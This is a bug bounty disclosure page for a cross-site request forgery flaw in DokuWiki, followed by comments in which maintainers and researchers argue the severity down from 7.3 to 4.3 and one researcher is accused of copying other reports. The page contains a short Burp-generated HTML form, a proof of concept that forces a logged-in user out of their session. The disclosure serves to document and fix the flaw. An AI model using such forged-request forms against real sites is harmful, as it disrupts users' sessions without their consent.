Cross-Site Request Forgery (CSRF) in splitbrain/dokuwiki

Valid

Reported on

Dec 12th 2021


Description

An attacker is able to log out a user if a logged-in user visits the attacker's website.

Proof of Concept

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost:8800/doku.php">
      <input type="hidden" name="id" value="wiki&#58;welcome" />
      <input type="hidden" name="do" value="logout" />
      <input type="hidden" name="sectok" value="e4e1654b3649a6ba8e7daef724bd54a0" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Impact

This vulnerability is capable of forging users to unintentional logout.

More Detail

One way GET could be abused here is that a person (competitor perhaps:) placed an image tag with src="<your logout link>" anywhere on the internet, and if a user of your site stumbles upon that page, he will be unknowingly logged out. This is why it should be a POST with a CSRF token.

Note

While this cannot harm a user's account, it can be a great annoyance and is a valid CSRF.

We are processing your report and will contact the splitbrain/dokuwiki team within 24 hours. 2 months ago
We have contacted a member of the splitbrain/dokuwiki team and are waiting to hear back a month ago
Andreas Gohr validated this vulnerability a month ago
Devendra Bhatla has been awarded the disclosure bounty
The fix bounty is now up for grabs
Andreas Gohr confirmed that a fix has been merged on 6a2553 a month ago
The fix bounty has been dropped
Andreas Gohr
a month ago

Maintainer


@admin is there a way to adjust the severity? It's not really high.

KhanhCM
a month ago

Hey @dev696,

A real researcher will not just copy all the content from other reports. You should try to write your reports by yourself. What have you learned after reporting this vulnerability? Just earn the bounty or improve your skills in cybersecurity?

Furthermore, the severity for this vulnerability is not High, it's Medium (CVSS from 4.3 to 6.5, maybe). You can check it on some reports or CVEs. The dokuwiki's users will be shocked if they know that their app has a High vulnerability with the impact is just log out a user with no affected to the account, just an annoyance!

Jamie Slome
a month ago

Admin


@splitbrain - absolutely, we can arrange that for you!

Can you advise on a severity score that would be more fitting for the report?

Please can you also create a CVSS vector string using the calculator here:

https://www.first.org/cvss/calculator/3.1

HDVinnie
a month ago

@admin @dev696 has def copy pasted my content from my reports. This should only be a 4.3

Devendra Bhatla
a month ago

Researcher


Hi @admin Please set CVSS to 4.3

Jamie Slome
a month ago

Admin


Can you please provide the CVSS vector string to use for the new CVSS score?

Devendra Bhatla
a month ago

Researcher


@admin Please find the below CVSS Vector string.

CVSS Score = 4.3 CVSS Vector string = CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Jamie Slome
a month ago

Admin


CVSS adjusted from 7.3 to 4.3 - thanks! 🙏

Devendra Bhatla
a month ago

Researcher


Thanks for all your help Jamie as always !